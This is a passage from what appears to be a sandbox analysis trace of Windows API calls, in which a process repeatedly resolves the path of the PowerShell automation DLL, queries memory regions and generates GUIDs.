lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ab580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.377] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ab580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.377] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.377] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.377] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.377] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.377] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.377] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.377] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.377] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.377] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.378] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.378] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.378] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.378] VirtualQuery (in: lpAddress=0x1ab910, lpBuffer=0x1ac7d0, dwLength=0x30 | out: lpBuffer=0x1ac7d0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.378] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.378] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.379] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.379] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abb80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.379] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.379] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.379] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abb80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.379] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.379] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.379] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abb80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.379] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.379] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.380] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abb80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.380] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.380] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1abad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.380] VirtualQuery (in: lpAddress=0x1ab910, lpBuffer=0x1ac7d0, dwLength=0x30 | out: lpBuffer=0x1ac7d0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.380] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.381] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.381] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0103.381] VirtualQuery (in: lpAddress=0x1ab910, lpBuffer=0x1ac7d0, dwLength=0x30 | out: lpBuffer=0x1ac7d0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.382] VirtualQuery (in: lpAddress=0x1ab910, lpBuffer=0x1ac7d0, dwLength=0x30 | out: lpBuffer=0x1ac7d0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.382] VirtualQuery (in: lpAddress=0x1ab000, lpBuffer=0x1abec0, dwLength=0x30 | out: lpBuffer=0x1abec0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.382] VirtualQuery (in: lpAddress=0x1ab090, lpBuffer=0x1abf50, dwLength=0x30 | out: lpBuffer=0x1abf50*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.383] VirtualQuery (in: lpAddress=0x1ab770, lpBuffer=0x1ac630, dwLength=0x30 | out: lpBuffer=0x1ac630*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.383] VirtualQuery (in: lpAddress=0x1ab800, lpBuffer=0x1ac6c0, dwLength=0x30 | out: lpBuffer=0x1ac6c0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.384] VirtualQuery (in: lpAddress=0x1ab770, lpBuffer=0x1ac630, dwLength=0x30 | out: lpBuffer=0x1ac630*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.384] VirtualQuery (in: lpAddress=0x1ab800, lpBuffer=0x1ac6c0, dwLength=0x30 | out: lpBuffer=0x1ac6c0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.384] VirtualQuery (in: lpAddress=0x1ab800, lpBuffer=0x1ac6c0, dwLength=0x30 | out: lpBuffer=0x1ac6c0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.384] VirtualQuery (in: lpAddress=0x1ab770, lpBuffer=0x1ac630, dwLength=0x30 | out: lpBuffer=0x1ac630*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.385] VirtualQuery (in: lpAddress=0x1ab800, lpBuffer=0x1ac6c0, dwLength=0x30 | out: lpBuffer=0x1ac6c0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.385] VirtualQuery (in: lpAddress=0x1ab770, lpBuffer=0x1ac630, dwLength=0x30 | out: lpBuffer=0x1ac630*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.385] VirtualQuery (in: lpAddress=0x1ab800, lpBuffer=0x1ac6c0, dwLength=0x30 | out: lpBuffer=0x1ac6c0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.385] VirtualQuery (in: lpAddress=0x1ab770, lpBuffer=0x1ac630, dwLength=0x30 | out: lpBuffer=0x1ac630*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.386] VirtualQuery (in: lpAddress=0x1ab800, lpBuffer=0x1ac6c0, dwLength=0x30 | out: lpBuffer=0x1ac6c0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.386] VirtualQuery (in: lpAddress=0x1ab440, lpBuffer=0x1ac300, dwLength=0x30 | out: lpBuffer=0x1ac300*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.386] VirtualQuery (in: lpAddress=0x1ab770, lpBuffer=0x1ac630, dwLength=0x30 | out: lpBuffer=0x1ac630*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.387] VirtualQuery (in: lpAddress=0x1ab800, lpBuffer=0x1ac6c0, dwLength=0x30 | out: lpBuffer=0x1ac6c0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.387] VirtualQuery (in: lpAddress=0x1ab770, lpBuffer=0x1ac630, dwLength=0x30 | out: lpBuffer=0x1ac630*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.387] VirtualQuery (in: lpAddress=0x1ab800, lpBuffer=0x1ac6c0, dwLength=0x30 | out: lpBuffer=0x1ac6c0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.387] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0xd56cd4f3, Data2=0xd7b, Data3=0x499a, Data4=([0]=0x9b, [1]=0xd8, [2]=0x9f, [3]=0x32, [4]=0xb7, [5]=0x3e, [6]=0xb1, [7]=0x44))) returned 0x0 [0103.389] VirtualQuery (in: lpAddress=0x1ab000, lpBuffer=0x1abec0, dwLength=0x30 | out: lpBuffer=0x1abec0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.389] VirtualQuery (in: lpAddress=0x1ab090, lpBuffer=0x1abf50, dwLength=0x30 | out: lpBuffer=0x1abf50*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.390] VirtualQuery (in: lpAddress=0x1ab2b0, lpBuffer=0x1ac170, dwLength=0x30 | out: lpBuffer=0x1ac170*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.390] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0xc3575c38, Data2=0x9bb3, Data3=0x4c4d, Data4=([0]=0x88, [1]=0xac, [2]=0x47, [3]=0xd5, [4]=0x2d, [5]=0x70, [6]=0xc4, [7]=0x3d))) returned 0x0 [0103.390] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0x71b47a85, Data2=0x3a76, Data3=0x42f6, Data4=([0]=0x9e, [1]=0x3e, [2]=0xa, [3]=0xe9, [4]=0x39, [5]=0xf8, [6]=0x8e, [7]=0xb7))) returned 0x0 [0103.391] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0x4fcadf1f, Data2=0x4daa, Data3=0x4997, Data4=([0]=0x89, [1]=0x6a, [2]=0xeb, [3]=0xb5, [4]=0x83, [5]=0xd9, [6]=0xc8, [7]=0xd1))) returned 0x0 [0103.391] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0x46a9d44, Data2=0x1e90, Data3=0x45db, Data4=([0]=0xb0, [1]=0x87, [2]=0x5c, [3]=0xab, [4]=0x60, [5]=0xe8, [6]=0xdd, [7]=0x1e))) returned 0x0 [0103.392] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0x1e28e5f2, Data2=0x60b8, Data3=0x45b0, Data4=([0]=0xab, [1]=0xb2, [2]=0xf6, [3]=0xab, [4]=0xa3, [5]=0xe, [6]=0x3c, [7]=0x69))) returned 0x0 [0103.392] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0x63cdee71, Data2=0xd16d, Data3=0x480b, Data4=([0]=0xb4, [1]=0x22, [2]=0x94, [3]=0xb0, [4]=0xad, [5]=0x2d, [6]=0x79, [7]=0xc1))) returned 0x0 [0103.392] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0x7331110b, Data2=0x7507, Data3=0x4ab8, Data4=([0]=0xbf, [1]=0xf8, [2]=0x8, [3]=0xd9, [4]=0x97, [5]=0xf4, [6]=0x48, [7]=0x50))) returned 0x0 [0103.393] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0x3dfd6611, Data2=0x187, Data3=0x43c7, Data4=([0]=0x9c, [1]=0xa2, [2]=0x3b, [3]=0xb7, [4]=0x96, [5]=0x14, [6]=0xc2, [7]=0xa6))) returned 0x0 [0103.393] VirtualQuery (in: lpAddress=0x1aae70, lpBuffer=0x1abd30, dwLength=0x30 | out: lpBuffer=0x1abd30*(BaseAddress=0x1aa000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.394] VirtualQuery (in: lpAddress=0x1aae70, lpBuffer=0x1abd30, dwLength=0x30 | out: lpBuffer=0x1abd30*(BaseAddress=0x1aa000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.394] VirtualQuery (in: lpAddress=0x1aaf00, lpBuffer=0x1abdc0, dwLength=0x30 | out: lpBuffer=0x1abdc0*(BaseAddress=0x1aa000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.394] VirtualQuery (in: lpAddress=0x1aae70, lpBuffer=0x1abd30, dwLength=0x30 | out: lpBuffer=0x1abd30*(BaseAddress=0x1aa000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.394] VirtualQuery (in: lpAddress=0x1aaf00, lpBuffer=0x1abdc0, dwLength=0x30 | out: lpBuffer=0x1abdc0*(BaseAddress=0x1aa000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.395] VirtualQuery (in: lpAddress=0x1aae70, lpBuffer=0x1abd30, dwLength=0x30 | out: lpBuffer=0x1abd30*(BaseAddress=0x1aa000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.395] VirtualQuery (in: lpAddress=0x1aaf00, lpBuffer=0x1abdc0, dwLength=0x30 | out: lpBuffer=0x1abdc0*(BaseAddress=0x1aa000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.395] VirtualQuery (in: lpAddress=0x1aae70, lpBuffer=0x1abd30, dwLength=0x30 | out: lpBuffer=0x1abd30*(BaseAddress=0x1aa000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.395] VirtualQuery (in: lpAddress=0x1aaf00, lpBuffer=0x1abdc0, dwLength=0x30 | out: lpBuffer=0x1abdc0*(BaseAddress=0x1aa000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.396] VirtualQuery (in: lpAddress=0x1aae70, lpBuffer=0x1abd30, dwLength=0x30 | out: lpBuffer=0x1abd30*(BaseAddress=0x1aa000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.396] VirtualQuery (in: lpAddress=0x1aaf00, lpBuffer=0x1abdc0, dwLength=0x30 | out: lpBuffer=0x1abdc0*(BaseAddress=0x1aa000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.396] VirtualQuery (in: lpAddress=0x1aae70, lpBuffer=0x1abd30, dwLength=0x30 | out: lpBuffer=0x1abd30*(BaseAddress=0x1aa000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.397] VirtualQuery (in: lpAddress=0x1aaf00, lpBuffer=0x1abdc0, dwLength=0x30 | out: lpBuffer=0x1abdc0*(BaseAddress=0x1aa000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.397] VirtualQuery (in: 